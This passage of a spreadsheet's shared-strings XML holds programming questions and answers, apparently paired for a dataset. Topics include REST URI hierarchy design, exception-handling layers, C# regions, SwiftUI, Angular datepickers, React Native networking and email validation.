This says that for the parent identified by {parentID}, find their child having `?search={text}` This is closer to correct to what you are wanting, and represents a parent-&gt;child relationship that can likely be used to model your entire API.  To model it this way, the burden is placed upon the client to recognize that if they have a "grandparentId", that there is a layer of indirection between the ID they have and the portion of the family graph they are wishing to see.  To find a "child" by "grandparentId", you can call your `/parents/{parentID}/children` service and then foreach child that is returned, search their children for your person identifier.
**Implementation of your requirements as URIs**
If you want to model a more extensible resource identifier that can walk the tree, I can think of several ways you can accomplish that.
**1)** The first one, I've already alluded to.  Represent the graph of "People" as a composite structure. Each person has a reference to the generation above it through its Parents path and to a generation below it through its Children path. 
`/Persons/Joe/Parents/Mother/Parents` 
would be a way to grab Joe's maternal grandparents.
`/Persons/Joe/Parents/Parents` 
would be a way to grab all of Joe's grandparents.
`/Persons/Joe/Parents/Parents?id={Joe.GrandparentID}` 
would grab Joe's grandparent having the identifier you have in hand.
and these would all make sense (note that there could be a performance penalty here depending on task by forcing a dfs on the server due to a lack of branch identification in the "Parents/Parents/Parents" pattern.)  You also benefit from having the ability to support any arbitrary number of generations.  If, for some reason, you desire to look up 8 generations, you could represent this as
`/Persons/Joe/Parents/Parents/Parents/Parents/Parents/Parents/Parents/Parents?id={Joe.NotableAncestor}`
but this leads into the second dominant option for representing this data: through a path parameter.
---
**2)** Use path parameters to "query the hierarchy"  You could develop the following structure to help ease the burden on consumers and still have an API that makes sense.
To look back 147 generations, representing this resource identifier with path parameters allows you to do
`/Persons/Joe/Parents;generations=147?id={Joe.NotableAncestor}`
To locate Joe from his Great Grandparent, you could look down the graph a known number of generations for Joe's Id.
`/Persons/JoesGreatGrandparent/Children;generations=3?id={Joe.Id}`
The major thing of note with these approaches is that without further information in the identifier and request, you should expect that the first URI is retrieving a Person 147 generations up from Joe with the identifier of Joe.NotableAncestor. You should expect the second one to retrieve Joe.  Assume that what you actually want is for your calling client to be able to retrieve the entire set of nodes and their relationships between the root Person and the final context of your URI.  You could do that with the same URI (with some additional decoration) and setting an Accept of `text/vnd.graphviz` on your request, which is the IANA registered media type for the `.dot` graph representation.  With that, change the URI to
`/Persons/Joe/Parents;generations=147?id={Joe.NotableAncestor.Id}#directed`
with an HTTP Request Header 
`Accept: text/vnd.graphviz` 
and you can have clients fairly clearly communicate that they want the directed graph of the generational hierarchy between Joe and 147 generations prior where that 147th ancestral generation contains a person identified as Joe's "Notable Ancestor."
I'm unsure if text/vnd.graphviz has any pre-defined semantics for its fragment;I could find none in a search for instruction.  If that media type actually does have pre-defined fragment information, then its semantics should be followed to create a conforming URI.  But, if those semantics are not pre-defined, the URI specification states that the semantics of the fragment identifier are unconstrained and instead defined by the server, making this usage valid.
---
&gt; 3) What are query strings really used for, besides "filtering" on your resource? If you go with the first approach, the filter parameter is embedded in the URI itself as a path parameter instead of a query string parameter.
I believe I have already thoroughly beaten this to death, but query strings are not for "filtering" resources. They are for *identifying* your resource from non-hierarchical data. If you have drilled down your hierarchy with your path by going
`/person/{id}/children/` and you are wishing to identify a *specific* child or a *specific* set of children, you would use some attribute that applies to the set you are identifying and include it inside the query.
  [1]: https://www.rfc-editor.org/rfc/rfc3986#section-3.4</t>
  </si>
  <si>
    <t xml:space="preserve">In continuation to my question [external-link]
I have decided to maintain a centralized database and several slave server-database configuration. I plan to use [external-link] for replicating between the slave and master database. Each server-database configuration would be installed closer to the client. Ideally I want the request from a client to route to the nearest slave server-database for the obvious reason. Since I'm using RMI to connect to the server, I want to know if there is any product/API currently available, which would solve this? 
Any other solution than the above one is highly regarded :)
Note: Refactoring the client code is definitely one alternative but since the application is very huge, its a huge risk (can break existing code), time taking &amp; expensive.
</t>
  </si>
  <si>
    <t>C871</t>
  </si>
  <si>
    <t>Description
Need to structure exceptions in such a way that the concerns are separated into the appropriate parts- controller, service, or repository.
Context
Link to conversation on exception handling
Discussion comment
Refactor: Separate the concerns for exception handling
Adding for posterity - I stumbled up on this SO thread that I think summarizes thoughts on what sort of exceptions ought to go at which layer of the architecture: https://softwareengineering.stackexchange.com/questions/393307/where-would-you-handle-exceptions-controller-service-repository. This doesn't necessarily describe the approach we're taking now, just documenting the research.</t>
  </si>
  <si>
    <t>Inside the service/repository, throwing the actual HTTP error
I agree with you, this doesn't belong here.
The service layer shouldn't know its consumer. Your services might be consumed by a web application today, but I should be able to start consuming them from e.g. a WPF application tomorrow,
without changing the service code
. When your services throw HTTP exceptions, that means your code is not reusable.
What's happening here is that the exception
type
is being abused as a message to the end user. That is not what the type should be used for.
However, what is correct is that you would throw different exception types based on the actual problem, and your web project can map this exception's type (or data) to a specific HTTP status code.
Let the exception or error bubble up until a global middleware catches it, and returns it back to the client.
I agree with this, except the (maybe too pedantic) mention of returning
it
(i.e. the exception) to the client. You shouldn't return the exception, but rather
use
the exception to generate an appropriate message.
That message
could
be an exception's details (which I often do in DEBUG mode, but never allow in RELEASE), or it could be a default "An error has occurred" message, or it could be a custom designed object of your own choosing. Pick what is appropriate for your situation.
As a real world example, we implemented a
PublicException
class (the name was different, but changed due to privacy reasons) in one of our projects. If an exception was of this type (or a derived type), its message would always be displayed to the user. This was by design, because some messages needed to actually be returned from the business layer to the consumer. This was part of the requirements/analysis that was given to us, so we had no choice in the matter.
This was set up as follows:
If it's a
PublicException
, return the exception message to the user.
In a RELEASE build, any other kind of exception would return a basic
"An error has occurred. Contact your admins and give them this reference: xxxxxx"
message
In a DEBUG build, any other kind of exception would have its message returned to the user, because this was assumed to be a local debug session by a developer.
All of our controllers had some middleware on them which caught any unhandled exceptions, and would format the return message (and HTTP status code) to the user.
The HTTP status code was decided based on the exception type.
PublicValidationException
leads to 400 bad request responses, non-
PublicException
exceptions to 500 internal server errors, and so on.
As a bare minimum (and that's a notable caveat), I believe that you only really need to have a last line of defense against exceptions, i.e. catch them on the controller level (or ideally some middleware in your web project). This last line of defense ensures that exceptions don't bleed to the consumer, because you should avoid this at all costs.
But that doesn't mean that your codebase should be the Wild West in terms of exception throwing. Exceptions should be avoided as much as possible, but you need a last line of defense in case one slips through.
Your business (and data) logic should avoid exceptions as much as possible. Exceptions are expensive, and it's generally much more efficient to return a pass/fail return value than it is to throw an exception. If exceptions are commonly expected, then they are not exceptional, and therefore should not be exceptions.
In cases where the exception effectively ends the life of the web request (you
cannot
continue because of the issue), just let it bubble up to the surface and let the middleware deal with it. Note of course that you can still enrich your thrown exception when it adds value.
If there are exceptions that would not end the life of the request (e.g. exception that a non-essential IO device is offline), then you have to of course handle these exception in your codebase. Where to do so is completely dependent on the work that should resume in case the exception is thrown.
So, to summarize:
Do not let your projects know who consumes them. HTTP details should only be known inside web project.
Always have a last line of defense against exceptions. Preferably as close to the end user as possible (= controller), and a middleware approach is often nice to use as a blanket line of defense.
Avoid using exceptions where possible. Always prefer returning values over exceptions. Exceptions should be, wel, exceptional.
If the current web request cannot recover from this exception, then let it bubble up (after maybe enriching it, where needed) to your last line of defense.
If the current web request can recover from this exception, then handle it at the appropriate location, i.e. where to resume the code execution from.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am quite new to Angular, and I am trying to use mat-datepciker component with 'DD/MM/YYYY' format. It is working when using calendar toggle, but not when entering the date manually inside the input field. At the beginning it automatically changed the date format. For example: if I entered 30/01/2024 it was changed to 01/30/2024. I changed this behaviour by adding this providers to my app's module:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{provide: MAT_DATE_LOCALE, useValue: 'es-ES'},
{ provide: MAT_DATE_FORMATS, useValue: 
{
        parse: {
          dateInput: 'DD/MM/YYYY',
        },
        display: {
          dateInput: 'DD/MM/YYYY',
          monthYearLabel: 'MMMM YYYY',
          dateA11yLabel: 'DD/MM/YYYY',
          monthYearA11yLabel: 'MMMM YYYY',
        },
      }
} ,
{ provide: DateAdapter, useClass: MomentDateAdapter },
{ provide: MAT_MOMENT_DATE_ADAPTER_OPTIONS, useValue: { useUtc: true } },
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, if I enter the date manually it is not being validated using 'DD/MM/YYYY' format, but 'MM/DD/YYYY' as you can see in the following screenshot:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/oTNyxUfA.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/oTNyxUfA.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How can I prevent this behaviour?&lt;/p&gt;
&lt;p&gt;My datepicker element:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;mat-form-field class=&amp;quot;col-sm-6 col-lg-6&amp;quot;&amp;gt;
      &amp;lt;mat-label&amp;gt;Data de registre posterior o igual a:&amp;lt;/mat-label&amp;gt;
      &amp;lt;input matInput [matDatepicker]=&amp;quot;picker&amp;quot; [(ngModel)]=&amp;quot;searchCriteria.dataRegistreInici&amp;quot;&amp;gt;
      &amp;lt;mat-datepicker-toggle matIconSuffix [for]=&amp;quot;picker&amp;quot;&amp;gt;&amp;lt;/mat-datepicker-toggle&amp;gt;
      &amp;lt;mat-datepicker #picker&amp;gt;&amp;lt;/mat-datepicker&amp;gt;
&amp;lt;/mat-form-field&amp;gt;    
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C872</t>
  </si>
  <si>
    <t>Hello. You have a good start point for such library. But you missed some "enterprise"-specific things. Let me provide some tips for your lib.
Rework the structure of your project. It's good practice to keep test and src files separately: https://softwareengineering.stackexchange.com/questions/369504/directory-structure-for-a-net-solution
Introduce templates for contributors. Some example: https://github.com/Azure/azure-sdk-for-net/issues/new/choose
Define flow for code review and chose one of git branch strategy: https://medium.com/@patrickporto/4-branching-workflows-for-git-30d0aaee7bf
Don't forget about SOLID principles during development
Add code analysis rules for project</t>
  </si>
  <si>
    <t>On MSDN, there are some very old official guidelines
. These are out of date though. As the page says, "
This content is outdated and is no longer being maintained. It is provided as a courtesy for individuals who are still using these technologies.
" So I'd recommend you avoid these guidelines.
There was an attempt to define a common solution structure via
Project Scaffold
. This is more orientated toward F# though, rather than C#. It didn't really take off though and there's little sign of development of the ideas these days.
The most active and up to date set of guidelines
is maintained by David Fowler, who is a developer at Microsoft on the ASP.NET team. These guidelines are used by many within Microsoft, including the Roslyn (the C# and VB.Net compiler) teams. You could do far worse than adopt that approach therefore.</t>
  </si>
  <si>
    <t xml:space="preserve">What artifacts / diagrams do use to document the flow of a web application taking into account links between static pages and how dynamic view components (html forms, JSP, Ajax, etc) interact with server-side components (Servlets, Struts actions, etc)? Do use UML diagrams?
</t>
  </si>
  <si>
    <t>C873</t>
  </si>
  <si>
    <t>Duplication of logic in two or more places.
Undesired dependencies. For applications divided into layers such as persistence, business and user interface, the dependencies between the layers need to be managed. Finding undesired dependencies such as the use of persistence code directly within the user interface layer is a strong indicator of a design problem. Move references to Nop.Core
Overly complex logic, like a large switch statement or series of nested if-else statements. Sometimes such logic can be drastically simplified through the use of object-oriented design principles.
Too many classes within one package.
Overly long file, in excess of a couple thousand lines. Even in Java where each public class is forced to be in its own file, it is possible to end up with very long files. This may be because there is too much logic within the class, or it may be because of many nested classes or private classes in the same file. In the latter case, these can be moved to one or more separate files.
Overly long methods. Anything longer than about one screen warrants a closer look to see if it can be simplified, usually via an extract method refactoring.
Poorly named classes, methods, fields or local variables. One indicator I look for is a one-sentence comment describing a vaguely named variable or method. Usually the variable or method can be renamed to capture the essence of the comment and the comment can then be deleted.
Lack of a class comment. A concise summary of the purpose of the class is often quite useful. If it is difficult to come up with such a summary, it is an indicator that the class may be trying to do too much or does not have a clear focus.
etc..
Improve the code design: use the initialization of classes and collections everywhere, replace the “for” loops to LINQ expression (where applicable)
Check the code with static analyzers, such as StyleCop and PVS-Studio
Too many methods within a class, particularly public methods. This is often an indicator that the class is trying to do too much and should be split into multiple classes.
Refactoring of big methods (split to several ones). For example, the PlaceOrder method from OrderProcessingService uses #region 3 times. The best practice says you shouldn't use regions inside methods. Methods should be short and each method should do only one thing. So instead of separating the method into 3 regions, you should refactor into 3 or more separate methods. The PlaceOrder method is not the only place where region is used inside methods, that's why the title was more general.
Here are other places where #region is used inside methods: Authorize in ExternalAuthorizer, FormatStockMessage in ProductExtensions, SearchProducts in ProductService, GetProductCount in ProductTagService, PrintOrdersToPdf in PdfService, DeleteGuestCustomers in CustomerService, InstallProducts in CodeFirstInstallationService, ProductListToHtmlTable in MessageTokenProvider. And the list can go on ... Also the constants, fields, properties and constructor are always in the same order so I don't think the use of #region is required. And #region is also used in some classes to group some related methods. For example, in CustomerService you have 2 regions: Customers and Customer roles. I think the Customer roles region should be moved to it's own CustomerRoleService and so the use of #region will not be necessary. More info about the use of regions: https://blog.codinghorror.com/the-problem-with-code-folding/ and http://softwareengineering.stackexchange.com/questions/53086/are-regions-an-antipattern-or-code-smell
Use one input and one output parameter for some methods (e.g. IPriceCalculationService and IOrderTotalCalculationService. IPriceCalculationService, IOrderTotalCalculationService, ITaxService, etc. What else? Right now we have a lot of input and output parameters. A lot of methods with the same names but different signatures. Let's use one input and one output parameter. Similar to "PlaceOrderResult PlaceOrder(ProcessPaymentRequest processPaymentRequest)" of IOrderProcessingService</t>
  </si>
  <si>
    <t>A code smell is a symptom which indicates that there is a problem in the design which will potentially increase the number of bugs: this is not the case for regions, but regions can contribute creating code smells, like long methods.
Since:
An anti-pattern (or antipattern) is a pattern used in social or business operations or software engineering that may be commonly used but is ineffective and/or counterproductive in practice
regions
are
anti-patterns. They require more work which doesn't increase the quality or the readability of the code, which doesn't reduce the number of bugs, and which may only make the code more complicated to refactor.
Don't use regions inside methods; refactor instead
Methods must be short
. If there are only ten lines in a method, you probably wouldn't use regions to hide five of them when working on other five.
Also,
each method must do one and one only thing
. Regions, on the other hand, are intended to
separate different things
. If your method does A, then B, it's logical to create two regions, but this is a wrong approach; instead, you should refactor the method into two separate methods.
Using regions in this case can also make the refactoring more difficult. Imagine you have:
private void DoSomething()
{
    var data = LoadData();
    #region Work with database
    var verification = VerifySomething();
    if (!verification)
    {
        throw new DataCorruptedException();
    }
    Do(data);
    DoSomethingElse(data);
    #endregion
    #region Audit
    var auditEngine = InitializeAuditEngine();
    auditEngine.Submit(data);
    #endregion
}
Collapsing the first region to concentrate on the second is not only risky: we can easily forget about the exception stopping the flow (there could be a guard clause with a
return
instead, which is even more difficult to spot), but also would have a problem if the code should be refactored this way:
private void DoSomething()
{
    var data = LoadData();
    #region Work with database
    var verification = VerifySomething();
    var info = DoSomethingElse(data);
    if (verification)
    {
        Do(data);
    }
    #endregion
    #region Audit
    var auditEngine = InitializeAuditEngine(info);
    auditEngine.Submit(
        verification ? new AcceptedDataAudit(data) : new CorruptedDataAudit(data));
    #endregion
}
Now, regions make no sense, and you can't possibly read and understand the code in the second region without looking at the code in the first one.
Another case I sometimes see is this one:
public void DoSomething(string a, int b)
{
    #region Validation of arguments
    if (a == null)
    {
        throw new ArgumentNullException("a");
    }
    if (b &lt;= 0)
    {
        throw new ArgumentOutOfScopeException("b", ...);
    }
    #endregion
    #region Do real work
    ...
    #endregion
}
It's tempting to use regions when arguments validation starts to span tens of LOC, but there is a better way to solve this problem: the one used by .NET Framework source code:
public void DoSomething(string a, int b)
{
    if (a == null)
    {
        throw new ArgumentNullException("a");
    }
    if (b &lt;= 0)
    {
        throw new ArgumentOutOfScopeException("b", ...);
    }
    InternalDoSomething(a, b);
}
private void InternalDoSomething(string a, int b)
{
    ...
}
Don't use regions outside methods to group
Some people use them to
group together fields, properties, etc.
This approach is wrong: if your code is StyleCop-compliant, then fields, properties, private methods, constructors, etc. are already grouped together and easy to find. If it's not, than it's time to start thinking about applying rules which ensure uniformity across your codebase.
Other people use regions to
hide lots of similar entities
. For example, when you have a class with hundred fields (which makes at least 500 lines of code if you count the comments and the whitespace), you may be tempted to put those fields inside a region, collapse it, and forget about them. Again, you are doing it wrong: with so many fields in a class, you should think better about using inheritance or slice the object into several objects.
Finally, some people are tempted to use regions to
group together related things
: an event with its delegate, or a method related to IO with other methods related to IO, etc. In the first case, it becomes a mess which is difficult to maintain, read and understand. In the second case, the better design would probably be to create several classes.
Is there a good use for regions?
No.
There was a legacy use: generated code. Still, code generation tools just have to use partial classes instead. If C# has regions support, it's mostly because this legacy use, and because now that too many people used regions in their code, it would be impossible to remove them without breaking existent codebases.
Think about it as about
goto
. The fact that the language or the IDE supports a feature doesn't mean that it should be used daily.
StyleCop SA1124 rule is clear: you should not use regions. Never.
Examples
I'm currently doing a code review of my coworker's code. The codebase contains a lot of regions, and is actually a perfect example of both how to not use regions and why regions lead to bad code. Here are some examples:
4 000 LOC monster:
I've recently read somewhere on Programmers.SE that when a file contains too many
using
s (after executing "Remove Unused Usings" command), it's a good sign that the class inside this file is doing too much. The same applies to the size of the file itself.
While reviewing the code, I came across a 4 000 LOC file. It appeared that the author of this code simply copy-pasted the same 15-lines method hundreds of times, slightly changing the names of the variables and the called method. A simple regex allowed to trim the file from 4 000 LOC to 500 LOC, just by adding a few generics; I'm pretty sure that with a more clever refactoring, this class may be reduced to a few dozens of lines.
By using regions, the author encouraged himself to ignore the fact that the code is impossible to maintain and poorly written, and to heavily duplicate the code instead of refactor it.
Region “Do A”, Region “Do B”:
Another excellent example was a monster initialization method which simply did task 1, then task 2, then task 3, etc. There were five or six tasks which were totally independent, each one initializing something in a container class. All those tasks were grouped into one method, and grouped into regions.
This had one advantage:
The method was pretty clear to understand by looking at the region names. This being said, the same method once refactored would be as clear as the original.
The issues, on the other hand, were multiple:
It wasn't obvious if there were dependencies between the regions. Hopefully, there were no reuse of variables; otherwise, the maintenance could be a nightmare even more.
The method was nearly impossible to test. How would you easily know if the method which does twenty things at a time does them correctly?
Fields region, properties region, constructor region:
The reviewed code also contained a lot of regions grouping all the fields together, all the properties together, etc. This had an obvious problem: source code growth.
When you open a file and see a huge list of fields, you are more inclined to refactor the class first, then work with code. With regions, you take an habit of collapsing stuff and forgetting about it.
Another problem is that if you do it everywhere, you'll find yourself creating one-block regions, which doesn't make any sense. This was actually the case in the code I reviewed, where there were lots of
#region Constructor
containing one constructor.
Finally, fields, properties, constructors etc.
should already be in order
. If they are and they match the conventions (constants starting with a capital letter, etc.), it's already clear where on type of elements stops and other begins, so you don't need to explicitly create regions for that.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I know there are existing posts where people have 'fixed' the issue (e.g. &lt;a href="https://stackoverflow.com/questions/67836347/swiftui-lazyvstack-does-not-update"&gt;SwiftUI: LazyVStack does not update&lt;/a&gt;). But I'd like to understand what the expected behaviour is so we can avoid side effects elsewhere in our codebase.&lt;/p&gt;
&lt;p&gt;The following code does not update the &lt;code&gt;ItemView&lt;/code&gt; if the wrapping HStack is present around it. Remove the HStack and it updates. Additionally, you can use an ID that is based on the properties (e.g. the ID changes if the count changes) and that also works.&lt;/p&gt;
&lt;p&gt;However I cannot find any documentation covering the 'why'.&lt;/p&gt;
&lt;p&gt;Below is the code. If you comment out HStack around each ItemView it stops rendering - however, the view does update, because it moves from the 'small' collection to the 'big' collection.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import Combine
import SwiftUI
struct ItemDetails: Identifiable {
    var name: String
    var count: Int
    var id: String
    var isBiggerThan4: Bool {
        count &amp;gt; 4
    }
}
struct ItemView: View {
    var item: ItemDetails
    var body: some View {
        HStack {
            Text(
                &amp;quot;Name:\(item.name) - Count:\(item.count) Bigger than 4: \(item.isBiggerThan4 ? &amp;quot;ðŸ”¥&amp;quot; : &amp;quot;nope&amp;quot;)&amp;quot;
            )
            .padding()
            .background(Color.blue.opacity(0.1))
            .cornerRadius(8)
            .font(.system(size: 10))
        }
    }
}
struct ContentView: View {
    // Start automatic updates every 2 seconds
    func item3Up() {
        self.items[2].count += 1
    }
    // Start automatic updates every 2 seconds
    func item3Down() {
        self.items[2].count -= 1
    }
    func decrementStuff() {
        self.items = self.items.map { item in
            var newItem = item
            newItem.count -= 1
            return newItem
        }
    }
    /// view
    @State var items: [ItemDetails] = [
        ItemDetails(name: &amp;quot;Item 1&amp;quot;, count: 1, id: &amp;quot;0&amp;quot;),
        ItemDetails(name: &amp;quot;Item 2&amp;quot;, count: 2, id: &amp;quot;1&amp;quot;),
        ItemDetails(name: &amp;quot;Item 2&amp;quot;, count: 3, id: &amp;quot;2&amp;quot;),
    ]
    @ViewBuilder
    private func showItems(items: [ItemDetails]?) -&amp;gt; some View {
        if let items, !items.isEmpty {}
    }
    var body: some View {
        VStack {
            // LazyVStack inside a ScrollView to show dynamic updates
            ScrollView {
                LazyVStack(alignment: .leading, spacing: 10) {
                    Text(&amp;quot;Small&amp;quot;)
                    ForEach(items.filter { !$0.isBiggerThan4 }) { item in
                        HStack {
                            ItemView(item: item)
                        }
                    }
                    Text(&amp;quot;Big&amp;quot;)
                    ForEach(items.filter { $0.isBiggerThan4 }) { item in
                        HStack {
                            ItemView(item: item)
                        }
                    }
                }
                .padding()
            }
            // Controls to add items and toggle auto updates
            HStack {
                Button(&amp;quot;Change Item 3 Up&amp;quot;) {
                    item3Up()
                }
                .buttonStyle(.bordered)
                Button(&amp;quot;Change Item 3 Down&amp;quot;) {
                    item3Down()
                }
                .buttonStyle(.bordered)
            }
            .padding()
        }
        .navigationTitle(&amp;quot;LazyVStack Demo&amp;quot;)
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C874</t>
  </si>
  <si>
    <t>Setup MVC-Structure
https://softwareengineering.stackexchange.com/questions/255636/how-to-determine-what-should-get-its-own-respective-controller</t>
  </si>
  <si>
    <t>In order to find the right grouping for controllers,
think of the testing
.
(Even if you don't actually do any testing, thinking of how you would go about testing your controllers will give you some very good insights on how to structure them.)
An
AuthenticationController
is not testable by itself, because it only contains functionality for logging in and logging out, but your testing code will need to somehow create fake accounts for testing purposes before it can test a successful login.  You could bypass the subsystem-under-test and go directly to your model for the creation of the testing accounts, but then you will have a fragile test in your hands: if the model changes, you will have to modify not only code which tests the model, but also also code which tests the controller, even though the interface and behavior of the controller has remained unchanged.  That's unreasonable.
A
LoginController
is unsuitable for the same reasons: you cannot test it without creating accounts first, and there are even more things that you cannot test, like for example preventing duplicate logins but then allowing a user to login after having logged out. (Since this controller has no logout functionality.)
An
AccountController
will give you everything you need in order to do your testing: you can create a test account and then try to login, you can delete the account and then make sure you cannot login anymore, you can change the password and make sure that the right password has to be used in order to login, etc.
To conclude: in order to write even the smallest test suite, you will need to make all of the functionality of the
AccountController
available to it.  Subdividing it down to smaller controllers appears to be yielding handicapped controllers with insufficient functionality for a proper test.  This is a very good indication that the functionality of
AccountController
is the smallest subdivision that makes sense.
And generally speaking, the "think of the testing" approach will work not only in this particular scenario, but in any similar scenario you come across in the future.</t>
  </si>
  <si>
    <t xml:space="preserve">Now unfortunately due to the fact that WinCE Usb Device Arrival / Removal exposes itself via WindowsMessages I have to ensure that a certain (non-UI) component is not created on a background thread. I would like to assert this via an exception but am lacking the code for the assertion.
This component creates a MessageWindow* and uses it to receive usb arrived/removed messages. The issue is if someone creates this component on a background thread (not necessarily; IsBackground = true) when the thread exits the window will be destroyed.
Any ideas?
*as an aside I still don't know why Form doesn't inherit from this class
Update
I think my version 1 wasn't very clear. So this is v2.
When you create a MessageWindow or a Form for that matter on a thread, when that thread exits the Window/Form is destroyed.
My component is creating a "hidden" message window to intercept some important events, ergo I do not wish for it to be destroyed. Therefore I must somehow ensure that the code that creates the form is running on the "Main UI" thread.
If possible i'd like to avoid passing down a reference to the "main" form to this component as it is (architecturally speaking) supposed to be miles away from the UI.
Update
Moving logging question to a separate Q.
</t>
  </si>
  <si>
    <t>C875</t>
  </si>
  <si>
    <t>for example. MainParticipantStore.swift, AuthStore.swift, DeepLinkStore.swift
I see you guys use the Factory pattern as well but I can't find info on Stores on google and am just curious why you use this design pattern.
Great question @shalem93!
This provides some history of the convention: https://softwareengineering.stackexchange.com/questions/184396/mvcs-model-view-controller-store
And here is an Apple API that uses store semantics:
https://developer.apple.com/documentation/swiftui/appstorage
But in a nutshell a store is just an object that handles data access so that it is single responsibility and reusable. This keeps higher layers simple. For example a view model can use a store to easily read data so that the view model is really just transforming data for display in a view and not directly having to deal with all the complexities about how the data is fetched or modified.
Data that a store handles might be on the file system, remote (for example REST API), or just in memory.
These objects could also be called services or managers. The name does not matter a lot but I like how store implies data access where they are used in the demo app. And I think at least in some of the early SwiftUI examples I saw from Apple the store convention was used which was nice to see.
Let me know if that helps!
Thank you for this response! Very helpful 👍</t>
  </si>
  <si>
    <t>"Store", in the case of MVCS design patterns, tends to lean towards storage logic. In the case of iOS, this is usually a Core Data implementation. If you create a Core Data-backed template in Xcode, you'll see the "Store" aspect of this design pattern tucked away in the AppDelegate class.
To take this to the next level, I will often create a singleton manager class that handles setting up the Core Data stack, and deals with all of the fetching/saving that is involved with the stack. As the quote you mentioned says, this makes it very easy to not only call those methods, but to adjust them if needed, as opposed to having saving/fetching calls all over the place in different view controllers.
The "Store" paradigm isn't restricted to Core Data, though. Your store may just be a web service. Perhaps you have a class that interacts with Facebook, Twitter, Yelp, or some other REST-based API. I have found (and similarly follow the trend) that these kinds of classes also have are named Manager. They are very literally managing all of the internal details so that your other classes can just put in or get out exactly what they need.
As far as obvious flaws or problems with this design pattern...As with any design pattern, the most glaring problem is ensuring that you've set up your project in such a way that jives with the paradigm. Especially with a design pattern that is new to you, this can sometimes be the hardest part. The benefit of breaking your "Store" logic out into its own class is the very fact that it makes code maintainability much easier.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am making a new React Native application for the first time. In this Application, I need to make a fetch request to an endpoint. This is the following code:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;const HOST = &amp;quot;localhost&amp;quot;;
const PORT = &amp;quot;8069&amp;quot;;
const DB = &amp;quot;db_2345&amp;quot;;
const webAuth = async () =&amp;gt; {
  try {
    // Retrieve user credentials
    const userData = await AsyncStorage.getItem('userData');
    if (!userData) throw new Error('User not logged in');
    const {user, pass} = JSON.parse(userData);
    // Authenticate user
    const authData = JSON.stringify({
      jsonrpc: '2.0',
      params: {
        db: DB,
        login: user,
        password: pass,
      },
    });
    const authRes = await fetch(
      `http://${HOST}:${PORT}/web/session/authenticate`,
      {
        method: 'POST',
        credentials: 'include',
        headers: {
          'Content-Type': 'application/json',
          'Access-Control-Allow-Credentials': true,
        },
        body: authData,
      },
    );
    if (!authRes.ok) throw new Error('Authentication failed');
    const sessionCookie = authRes.headers.get('set-cookie');
    if (!sessionCookie)
      throw new Error(
        &amp;quot;Session ID couldn't be used! Unable to find it in headers&amp;quot;,
      );
      return sessionCookie;
  } catch (error) {
    console.log(error);
    throw error;
  }
};
  async function checkInOutSystem (latitude=20 , longitude=20) {
    try{
      const sessionCookie = await webAuth();
    // Perform check-in/out
    const locData = JSON.stringify({
      jsonrpc: &amp;quot;2.0&amp;quot;,
      method: &amp;quot;call&amp;quot;,
      params: { latitude, longitude },
    });
    const attendanRes = await axios.post(
      `http://${HOST}:${PORT}/hr_attendance/systray_check_in_out`,
      locData,
      {
        // withCredentials: true,
        headers: {
          &amp;quot;Content-Type&amp;quot;: &amp;quot;application/json&amp;quot;,
          Cookie: sessionCookie,
          &amp;quot;Accept&amp;quot;: &amp;quot;application/json&amp;quot;,
        },
      }
    );
    console.log(&amp;quot;attendanceRes:&amp;quot;,attendanRes);
    if (attendanRes.status !== 200) throw new Error(&amp;quot;Check-in/out request failed&amp;quot;);
    console.log(attendanRes.data)
    const responseJson = attendanRes.data;
    console.log(&amp;quot;responseJson&amp;quot;,responseJson);
    return responseJson;
  } catch (error) {
    console.error(&amp;quot;Check-in/out error:&amp;quot;, error.message);
    throw error;
  }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On executing this part of the code, specifically in android emulator, for some weird reason, the request to &lt;code&gt;http://${HOST}:${PORT}/hr_attendance/systray_check_in_out&lt;/code&gt; fails with an error saying &lt;code&gt;Network Error&lt;/code&gt;, but this doesn't happen everytime. It works sometimes but about 95% of the time, it fails.&lt;/p&gt;
&lt;p&gt;I can't figure out why this is happening on Android emulator because I found that this same code works 100% of the time in an actual android device when connected through adb.&lt;/p&gt;
&lt;p&gt;I have tried debugging the issue, but I simply can't figure out any reasons for this simple piece of code to not work. The same code works when it runs on an android device so there is no reason for it to not work in an emulator. Yes, the &lt;code&gt;android:usesCleartextTraffic&lt;/code&gt; is set to true already. Neither using fetch, nor using axios affects this issue. The unreliablity of the network call remains the same in emulator.&lt;/p&gt;
&lt;p&gt;So I am trying to find out if there is any known issue to other React Native developers because of which FETCH request in emulator doesn't work perfectly.&lt;/p&gt;
&lt;p&gt;Any help or information regarding this is appreciated! Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C876</t>
  </si>
  <si>
    <t xml:space="preserve"> Simplify article: How to validate email with regex
To do:
Simplify the regex, so that it's easier to read and parse.
Indicate that a regex for email is highly complicated and may never cover every possibility.
For security purposes and further validation, send a test email to the email address.
Original issue content
Related to the discussion on #5305 @pkulikov @weshaggard @dasMulli @BillWagner @mairaw @rpetrusha
Hello! I wanted to just run the idea of deleting this article by you all. As we can see from the many issues opened on it, a lot of people want to have the regex tweaked to fit their specific needs.
Reading through quite a few articles on this subject, it seems that the general consensus is to not use regex to validate every email type, but instead to just use a simple structural validator (contains @ and .) and to use a verification email to truly validate the email.
Options
Delete the article
Simplify the article
??
References
Problems related to matching
https://codereview.stackexchange.com/questions/77072/regex-to-match-email-address
https://softwareengineering.stackexchange.com/questions/78353/how-far-should-one-take-e-mail-address-validation/78363#78363</t>
  </si>
  <si>
    <t>There is no 100% reliable way of confirming a valid email address other than sending an email to user and and waiting for a response, like most forums.
I would go with the simple "@" validation rule and then email the user to confirm their email address.
Although, this is my personal opinion... I await other suggestions.</t>
  </si>
  <si>
